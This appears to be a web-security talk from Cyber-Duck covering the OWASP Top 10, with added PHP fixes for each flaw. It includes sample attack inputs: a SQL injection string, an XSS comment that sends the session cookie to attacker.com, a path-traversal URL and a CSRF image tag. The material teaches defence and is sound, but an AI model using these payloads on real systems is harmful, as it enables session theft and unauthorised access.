15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
Introduction
• Was: UH Student - Graduated 2012
• Now: Full Stack Developer at Cyber-Duck
• Things I do:
– Programmer: PHP, MySQL, Node.js (JavaScript), MongoDB, HTML/CSS etc.
– System Administrator: Linux server management
– Security Tester: Reviewing and testing web apps
• Things I use:
– TDD / BDD
– Continuous Integration (Jenkins/Travis)
– Vagrant + Docker
Knowledge Transfer Partnerships
“A relationship formed between a company and an academic institution ('Knowledge Base' partner), which facilitates the transfer of knowledge, technology and skills to which the company partner
currently has no access. Each partnership employs one or more recently qualified people (known as an Associate) to work in a
company on a project of strategic importance to the business, whilst also being supervised by the Knowledge Base Partner.
Projects vary in length between 12 and 36 months. The Associates are either postgraduate researchers, university graduates, or individuals qualified to at least NVQ (Level 4) or equivalent.”
WHEN YOU GRADUATE APPLY FOR THESE
This talk…
• A bit about Cyber-Duck
• The development process
• Server security
• Application security
• Testing
The process
• Research
– Determine all security considerations for the project
• User Experience
– Follow best practices
• Art Direction
• Development
– Design production environment
– Secure coding
– Continuous testing
• Marketing
• Support
– Bug reports
– More testing
Server Security
• Type of server
– Cloud, dedicated, shared, in-house
• Server stack
– Operating system
– Language / Technology
– Database / Caching
– Scaling options
• Protection
– Anti-virus & Anti-malware
– Firewalls & IPS
– Back ups
– Others…
Server Management
• Most servers have similar configurations
• More clients = more traffic = more servers
• Need a way to keep all of them up to date
• We use Configuration Management software
• Several available: Ansible, Chef, Puppet, etc.
We use Puppet
• Master server holds the config for all servers
• Agent servers pull their config every half an hour (Puppet's default run interval)
• Patch once, everything updates
• The same manifests can be used with Vagrant for development, so dev boxes match production
Application Security
• Starts in the research phase of a project
– Evaluate possible points of attack
• UX: design the application around secure methods from the start
• Security is most relevant during Development
– Be aware of vulnerabilities
– Follow safe practices
– Test for missed vulnerabilities
• Post-launch, continue testing
– Bugs may reveal vulnerabilities
– Bug-fixes may create vulnerabilities
Staying aware of vulnerabilities
• Official lists and statistics – OWASP Top 10, CSA, etc.
• Mailing lists
• Industry news
• Blogs
• Social media – especially twitter
• Common Vulnerability Scoring System (CVSS)
– https://web.nvd.nist.gov/ - 3,365 vulnerabilities in the last 3 months
OWASP Top 10
A1 Injection
A2 Broken Authentication and Session Management
A3 Cross-Site Scripting (XSS)
A4 Insecure Direct Object References
A5 Security Misconfiguration
A6 Sensitive Data Exposure
A7 Missing Function Level Access Control
A8 Cross-Site Request Forgery (CSRF)
A9 Using Components with Known Vulnerabilities
A10 Unvalidated Redirects and Forwards
Injection
• Most common is SQL injection
• Applications are vulnerable when untrusted input is concatenated into a query (or a command) instead of being passed as a parameter; validating the input helps, but is not a substitute for a prepared statement
• The example below uses the old mysql_* extension, which was deprecated in PHP 5.5 and removed in PHP 7.0; use PDO or mysqli with prepared statements instead
Example:
<?php
$user = $_POST['user_id'];
$query = "SELECT * FROM users WHERE id LIKE '%$user%'";
$result = mysql_query($query);

user_id = "' OR 1; #"

"SELECT * FROM users WHERE id LIKE '%' OR 1; #%'"
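The lookup from the slide built both ways, as an added example that is not code from the slides or from Cyber-Duck. It runs against an in-memory SQLite database through PDO (assumes PHP 7.2+ with pdo_sqlite) so it works offline; the two sample users are constructed for the demo. The payload uses "--" rather than the slide's "#" because SQLite does not accept MySQL's "#" comment; the effect on the query is the same.

```php
<?php
// Added example, not code from the slides: the same lookup, unsafe and safe,
// run against an in-memory SQLite database. Sample rows are constructed here.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id TEXT, name TEXT)");
$db->exec("INSERT INTO users VALUES ('alice01', 'Alice'), ('bob02', 'Bob')");

// Vulnerable: the request value is pasted into the SQL text, so a quote in
// the value ends the string literal and the rest becomes SQL.
function findUsersUnsafe(PDO $db, string $user): array
{
    $query = "SELECT * FROM users WHERE id LIKE '%$user%'";
    return $db->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: the value is bound as a parameter. The SQL text is fixed at prepare
// time, so the value can only ever be compared as data, never parsed as SQL.
function findUsersSafe(PDO $db, string $user): array
{
    $stmt = $db->prepare("SELECT * FROM users WHERE id LIKE :pattern");
    $stmt->execute([':pattern' => '%' . $user . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed attack value, equivalent to the slide's "' OR 1; #".
$payload = "' OR 1 -- ";
printf("unsafe: %d rows\n", count(findUsersUnsafe($db, $payload)));
printf("safe:   %d rows\n", count(findUsersSafe($db, $payload)));
```

The unsafe call returns every user, because the query becomes `... WHERE id LIKE '%' OR 1 -- %'`; the safe call returns none, because no id contains the literal text `' OR 1 -- `. Note that the `%` wildcards are added to the bound value, not to the SQL, which is the usual way to parameterise a LIKE.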
Broken Authentication and Session Management
• Misconfiguration of authentication and session management
• Attackers use this to compromise passwords, keys, session tokens or other valuable data
Example: Session Hijacking
http://example.com/loggedin?sess_id=a1b2c3d4e5f6
If the victim forwards this link (for example by email), whoever opens it is logged in as the victim, because the session ID travels in the URL, where it is also left behind in browser history, Referer headers and server logs.
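Session settings and a login handler that together close the hole above, as an added example that is not code from the slides or from Cyber-Duck. It assumes PHP 7.3+ (for `session.cookie_samesite`) and a hypothetical `$checkCredentials` callback that returns the user id on success or null on failure.

```php
<?php
// Added example, not code from the slides: refuse session IDs in the URL and
// rotate the ID at login so a leaked or fixed ID is worthless.

// Session ID only ever in a cookie, never in a query string or rewritten link.
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');
// Reject IDs the server did not issue itself (stops session fixation).
ini_set('session.use_strict_mode', '1');
// Cookie unreadable from JavaScript, sent only over HTTPS, not on cross-site POSTs.
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_secure', '1');
ini_set('session.cookie_samesite', 'Lax');
session_start();

// $checkCredentials is an assumed callback: (string $username, string $password): ?int
function login(callable $checkCredentials, string $username, string $password): bool
{
    $userId = $checkCredentials($username, $password);
    if ($userId === null) {
        return false;
    }
    // New ID after privilege change; "true" deletes the old session file.
    session_regenerate_id(true);
    $_SESSION['user_id'] = $userId;
    $_SESSION['logged_in_at'] = time();
    return true;
}

function logout(): void
{
    $_SESSION = [];
    // Expire the cookie in the browser as well as destroying the server side.
    $p = session_get_cookie_params();
    setcookie(session_name(), '', time() - 42000, $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    session_destroy();
}
```

With `use_only_cookies` and `use_trans_sid` set this way, a request for `/loggedin?sess_id=a1b2c3d4e5f6` simply starts a fresh anonymous session; the value in the URL is ignored.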
Cross-Site Scripting (XSS)
• Occurs when user input is sent back to the browser without being encoded for the context it lands in (HTML body, attribute, JavaScript, URL)
• Allows an attacker to execute scripts in the victim's browser, in the origin of the vulnerable site
Example: Comment forms
A comment is left:
<script type="text/javascript"> document.location = "http://attacker.com/post?cookie=" + document.cookie;</script>
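Rendering the comment above so that the script stays inert text, as an added example that is not code from the slides or from Cyber-Duck. It assumes PHP 7.2+; the comment and author are constructed for the demo.

```php
<?php
// Added example, not code from the slides: encode on output, in the HTML
// context, every time untrusted text is written into a page.

// HTML-body/attribute encoder: quotes included (ENT_QUOTES) so the same
// function is safe inside double- or single-quoted attributes, and invalid
// UTF-8 replaced (ENT_SUBSTITUTE) rather than silently returning "".
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

function renderComment(string $author, string $body): string
{
    return '<li><b>' . e($author) . '</b>: ' . e($body) . '</li>';
}

// Constructed input: the payload from the slide, exactly as an attacker would post it.
$comment = '<script type="text/javascript"> document.location = "http://attacker.com/post?cookie=" + document.cookie;</script>';
echo renderComment('anon', $comment), PHP_EOL;
```

The `<` and `"` characters come out as `&lt;` and `&quot;`, so the browser shows the script source as text instead of running it. This encoder is only correct for HTML body and attribute contexts; text written into a `<script>` block or a URL needs that context's own encoding. Marking the session cookie HttpOnly limits what this particular payload can steal but does not remove the XSS.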
Insecure Direct Object References
• Internal implementation details are exposed to the user, e.g. a file location or a database key
• The reference is not properly protected, so an attacker can manipulate it to reach objects they were never meant to see
Example:
http://example.com/user_uploads/my_image.png
http://example.com/user_uploads/../../.htaccess
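A download handler that fixes both halves of the problem, as an added example that is not code from the slides or from Cyber-Duck: the requested name is treated as an indirect reference (it must be a file the current user owns) and the resolved path is then checked to stay inside the uploads directory. It assumes PHP 7.2+; the directory, the file and the ownership table are constructed for the demo, and in a real application the ownership lookup would be a database query.

```php
<?php
// Added example, not code from the slides: authorise the reference, then
// confirm the filesystem path never leaves the uploads directory.
$base = sys_get_temp_dir() . '/uploads_demo_' . bin2hex(random_bytes(4));
mkdir($base, 0700);
file_put_contents($base . '/my_image.png', 'constructed sample bytes');
$ownership = ['my_image.png' => 'alice']; // constructed; normally a DB lookup

function resolveUpload(string $baseDir, string $requested, string $user, array $ownership): ?string
{
    // 1. Syntactic check: a bare filename only; no separators, no "." or "..".
    if (!preg_match('/^[A-Za-z0-9._-]+$/', $requested) || $requested === '.' || $requested === '..') {
        return null;
    }
    // 2. Authorisation: the name must be one this user owns (indirect reference).
    if (($ownership[$requested] ?? null) !== $user) {
        return null;
    }
    // 3. Defence in depth: realpath() collapses ../ and symlinks; the result
    //    must still start with the base directory followed by a separator.
    $root = realpath($baseDir);
    $candidate = $root === false ? false : realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false
        || strncmp($candidate, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

var_dump(resolveUpload($base, 'my_image.png', 'alice', $ownership));    // the owner
var_dump(resolveUpload($base, 'my_image.png', 'mallory', $ownership));  // someone else
var_dump(resolveUpload($base, '../../.htaccess', 'alice', $ownership)); // traversal attempt
```

Only the first call yields a path. The `realpath()` comparison is kept even though step 1 already rejects separators, because a later change to the allowed-name rule should not silently reopen the traversal.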
Security Misconfiguration
• Several programs are required to run a single web application
• Any one of these can have a vulnerability if misconfigured
• Secure settings should be defined, implemented, and maintained, as defaults are often insecure
• Software should be kept up to date
Sensitive Data Exposure
• Applications dealing with sensitive data must protect it
• Suitable encryption or hashing must be used, and used correctly
• Data needs to be protected in transit and at rest
Example:
A website encrypts credit card data in the database using the database's built-in encryption functions, with the key supplied inside the query. An injection vulnerability in the application then lets an attacker call the matching decrypt function and read the card data in clear. If the application encrypted the data before storing it, with a key the database never sees, the injection would only recover ciphertext. (Storing card numbers at all puts the system in PCI DSS scope; store them only when the business genuinely needs to.)
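Application-side encryption of the kind the example calls for, as an added example that is not code from the slides or from Cyber-Duck. It uses libsodium's secretbox (PHP 7.2+, pdo_sqlite for the demo table); the key is generated in memory here only for the demo and would in production come from outside the database (environment, secrets manager or HSM), and the card number is a constructed test value.

```php
<?php
// Added example, not code from the slides: encrypt in the application before
// the value reaches the database, so a query that dumps the table (the
// injection case) yields only ciphertext.
$key = sodium_crypto_secretbox_keygen(); // demo only; real key lives outside the DB

// nonce || ciphertext+MAC, base64 so it fits a TEXT column. A fresh random
// nonce per value means identical card numbers never produce identical rows.
function sealForStorage(string $plaintext, string $key): string
{
    $nonce = random_bytes(SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    return base64_encode($nonce . sodium_crypto_secretbox($plaintext, $nonce, $key));
}

// Returns null on malformed input or a failed MAC (tampered ciphertext).
function openFromStorage(string $stored, string $key): ?string
{
    $raw = base64_decode($stored, true);
    $min = SODIUM_CRYPTO_SECRETBOX_NONCEBYTES + SODIUM_CRYPTO_SECRETBOX_MACBYTES;
    if ($raw === false || strlen($raw) < $min) {
        return null;
    }
    $nonce = substr($raw, 0, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    $box = substr($raw, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    $plain = sodium_crypto_secretbox_open($box, $nonce, $key);
    return $plain === false ? null : $plain;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE cards (user_id TEXT, card_blob TEXT)");
$ins = $db->prepare("INSERT INTO cards VALUES (:u, :c)");
$ins->execute([':u' => 'alice', ':c' => sealForStorage('4111 1111 1111 1111', $key)]); // constructed test PAN

// What an attacker who can run arbitrary SELECTs gets: opaque blobs.
foreach ($db->query("SELECT card_blob FROM cards") as $row) {
    echo "stored:    ", $row['card_blob'], PHP_EOL;
}
// What the application, which holds the key, can recover.
$row = $db->query("SELECT card_blob FROM cards WHERE user_id = 'alice'")->fetch(PDO::FETCH_ASSOC);
echo "decrypted: ", openFromStorage($row['card_blob'], $key), PHP_EOL;
sodium_memzero($key);
```

Because the key is never passed to the database, no SQL an attacker can inject, whether through the application's connection or from a stolen backup, can decrypt the column; the remaining exposure is the application process itself, which is why the key should be held in memory only while needed.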
Missing Function Level Access Control
• When a user logs in their access level is verified; it must also be verified on every subsequent request, not just on the links the UI chooses to show
Example:
A website has user and admin areas. An attacker logs in as an ordinary user and is redirected to:
http://example.com/user/dashboard
They then type the following URL and are given full access, because the admin pages never re-check the role:
http://example.com/admin
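An authorisation check that runs on every request, keyed on the role stored in the session at login, as an added example that is not code from the slides or from Cyber-Duck. It assumes PHP 7.2+; the routing rules and the sample session are constructed for the demo, and the path would in practice come from `parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH)` after normalisation.

```php
<?php
// Added example, not code from the slides: decide per request, from the
// server-side session, whether this path may be served at all.

// Which role a path requires; null means public. The prefix test requires
// the separator so "/administrator" is not mistaken for the admin area.
function requiredRole(string $path): ?string
{
    if ($path === '/admin' || strncmp($path, '/admin/', 7) === 0) {
        return 'admin';
    }
    if ($path === '/user' || strncmp($path, '/user/', 6) === 0) {
        return 'user';
    }
    return null;
}

function isAllowed(array $session, string $path): bool
{
    $need = requiredRole($path);
    if ($need === null) {
        return true;
    }
    $role = $session['role'] ?? null;
    if ($role === null) {
        return false; // not logged in
    }
    // admin implies user; nothing implies admin.
    return $role === $need || ($role === 'admin' && $need === 'user');
}

// Call before dispatching any request, in the front controller, not in each page.
function guard(array $session, string $path): void
{
    if (!isAllowed($session, $path)) {
        http_response_code(403);
        exit('Forbidden');
    }
}

$userSession = ['user_id' => 42, 'role' => 'user']; // constructed
var_dump(isAllowed($userSession, '/user/dashboard'));
var_dump(isAllowed($userSession, '/admin'));
var_dump(isAllowed($userSession, '/admin/users'));
```

The first call is allowed and the other two are refused. The point of `guard()` living in the front controller is that a new admin page added later is protected by default; the slide's bug is what happens when each page is trusted to remember the check itself.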
Cross-Site Request Forgery (CSRF)
• An attacker tricks the user's browser into sending a request to a site where the user is already authenticated, so the site performs an action the user never intended.
Example:
A user is logged in to their bank account, which uses a session cookie. The user then visits an attacker's website containing the following code:
<img src="http://bank.com/transfer?to=12345&amount=100" />
The browser attaches the bank.com session cookie to the image request, so bank.com treats it as a request the user made.
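A per-session CSRF token, issued in the form and verified on every state-changing request, as an added example that is not code from the slides or from Cyber-Duck. It assumes PHP 7.2+; the session array and the sample requests are constructed for the demo (in a real handler `$session` is `$_SESSION` and `$post` is `$_POST`).

```php
<?php
// Added example, not code from the slides: a secret the attacker's page cannot
// read, which must accompany every state-changing request.

// One random token per session, created on first use.
function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to embed in every form that changes state.
function csrfField(array &$session): string
{
    $token = htmlspecialchars(csrfToken($session), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '">';
}

// Verify before acting. State changes are accepted only via POST, so the
// <img> trick (always a GET) fails regardless of the token.
function verifyCsrf(array $session, array $post, string $method): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given)) {
        return false;
    }
    return hash_equals($expected, $given); // constant-time comparison
}

$session = []; // constructed stand-in for $_SESSION
echo csrfField($session), PHP_EOL;

$genuine = ['csrf_token' => $session['csrf_token'], 'to' => '12345', 'amount' => '100'];
var_dump(verifyCsrf($session, $genuine, 'POST'));                        // the real form
var_dump(verifyCsrf($session, ['to' => '12345', 'amount' => '100'], 'GET')); // the <img> request
var_dump(verifyCsrf($session, ['csrf_token' => 'guess', 'to' => '12345'], 'POST')); // forged POST
```

Only the genuine form passes. The attacker's page can make the browser send the cookie but cannot read the token out of the bank's page to include it, because the same-origin policy blocks that read. Setting the session cookie with `SameSite=Lax` (PHP 7.3+) adds a second, browser-enforced layer, but the token remains the check the server controls.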
Using Components with Known Vulnerabilities
• Modern web applications are built with libraries, frameworks, plugins, etc. Vulnerabilities can exist in 3rd party code
• Not updating these libraries leaves publicly known vulnerabilities in place, and attackers know exactly where to look for them
• Dependency managers (composer, npm, etc.) can help with this, but updates still need to be tested
Unvalidated Redirects and Forwards
• Sometimes it's necessary to redirect or forward a user from one application page to another based on a request parameter. The target needs to be validated, otherwise the parameter can be used to send users to an attacker's site or to forward them into pages they are not authorised for.
Example:
http://example.com/login?redirect=dashboard
Is changed by an attacker to
http://example.com/login?redirect=admin
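Handling the redirect parameter as a key into a fixed table of internal destinations, with the destination still subject to the normal role check, as an added example that is not code from the slides or from Cyber-Duck. It assumes PHP 7.2+; the destination table and the role values are constructed for the demo.

```php
<?php
// Added example, not code from the slides: never redirect to a user-supplied
// URL; map a short key to a known internal path and authorise the path.
const REDIRECTS = [
    'dashboard' => '/user/dashboard',
    'account'   => '/user/account',
    'admin'     => '/admin',
];

function redirectTarget(?string $key, string $role): string
{
    $default = '/user/dashboard';
    // Unknown keys, including full URLs and scheme-relative "//evil.example",
    // fall back to the default rather than being echoed into Location.
    if ($key === null || !array_key_exists($key, REDIRECTS)) {
        return $default;
    }
    $path = REDIRECTS[$key];
    // The forward must obey the same rule as a direct request for that page,
    // so "redirect=admin" from an ordinary user goes to the dashboard.
    if ($path === '/admin' && $role !== 'admin') {
        return $default;
    }
    return $path;
}

function afterLogin(?string $key, string $role): void
{
    header('Location: ' . redirectTarget($key, $role), true, 303);
    exit;
}

var_dump(redirectTarget('dashboard', 'user'));
var_dump(redirectTarget('admin', 'user'));
var_dump(redirectTarget('admin', 'admin'));
var_dump(redirectTarget('http://attacker.example/', 'user'));
```

If the application genuinely has to accept free-form URLs, the check becomes: parse with `parse_url()`, refuse anything with a scheme or host (which also catches the `//host` form), and require the path to start with a single `/`; an allowlist of keys as above is simpler to get right.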
Questions?
Contact
Mark [email protected]
@MGarratt88
http://www.cyber-duck.co.uk